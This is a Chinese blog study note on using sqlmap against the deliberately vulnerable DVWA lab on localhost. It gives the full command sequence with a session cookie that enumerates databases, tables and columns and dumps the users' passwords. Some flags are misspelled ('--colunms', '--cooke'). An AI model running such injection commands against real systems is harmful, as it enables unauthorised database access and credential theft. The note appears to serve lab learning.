SQLmap注入学习实战 —— dvwa 从low到impossble
2018-01-10 05:12
501 查看
大晚上失眠了于是来写博客
好了,然后我们打开sqlmap 输入
不是很推荐用默认YES的选项,可能会错过一些很关键的操作,但是比较懒的话,还是加上 –batch吧
输入代码
记住 -D 与 –tables 使用 tables不是列表的意思么。
记住 -T 和 –colunms 结合使用 colunms不就是列么?
记住 -C 和 –dump 结合使用 dump就是倾倒的意思嘛~~
然后就找到密码了。
一般都是这个流程。
写篇博文过一下知识点,这些流程网上其实都找得到的。
2018年1月10日04:54:57
烧包
哇,再过一个小时就可以去晨跑了
你为啥这么勤奋
白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大
爆破库名
由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这边要还要提交 cookie的值。 通过burpsuite截取包裹,我们发现我们包裹的cookie是--cookie="security=impossible; security=low; Phpstorm-1c732ebb=8670e59f-a605-41f8-ad48-cfe0c5467ac0;PHPSESSID=ejq8q5fgjdcshgej49de1q2557" 这就是我说的不太对的地方了,明明设置成了low,可是cookie里面居然还提交了impossible,还有这个phpstrom是啥东西。。。我phpstorm开都没有开啊。 所以这正常的应该是这样子的。 --cooke="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557"
好了,然后我们打开sqlmap 输入
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" --dbs
不是很推荐用默认YES的选项,可能会错过一些很关键的操作,但是比较懒的话,还是加上 –batch吧
available databases [5]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] sys
爆破表
倒完之后呢,接下来进入 爆破表输入代码
记住 -D 与 –tables 使用 tables不是列表的意思么。
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa --tables
爆破列
爆破列记住 -T 和 –colunms 结合使用 colunms不就是列么?
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users --colunms
爆破字段
爆破字段记住 -C 和 –dump 结合使用 dump就是倾倒的意思嘛~~
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C password,users --dump
然后就找到密码了。
一般都是这个流程。
写篇博文过一下知识点,这些流程网上其实都找得到的。
2018年1月10日04:54:57
烧包
哇,再过一个小时就可以去晨跑了
相关文章推荐
- SQL 手动注入学习实战 —— dvwa 从low到impossible《low篇》
- SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法
- DVWA+SQLmap+Mysql注入实战
- 1.羽翼sqlmap学习笔记之Access注入
- 2.羽翼sqlmap学习笔记之MySQL注入
- 【安全牛学习笔记】SQLMAP- 自动注入
- sqlmap之(三)----Access注入实战
- sqlmap cookie注入实战
- sqlmap之(四)----Mysql注入实战
- sqlmap之(六)----POST登陆框注入实战
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 【实战分享】sqlmap显示有注入却无法爆出库名
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- sqlmap之(五)----Cookie注入实战
- scala学习之:scala的self Types与依赖注入的代码实战
- 【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION
- 【安全牛学习笔记】SQLMAP- 自动注入
- 4.羽翼sqlmap学习笔记之Post登录框注入
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT
- Spring学习笔记-注入实战篇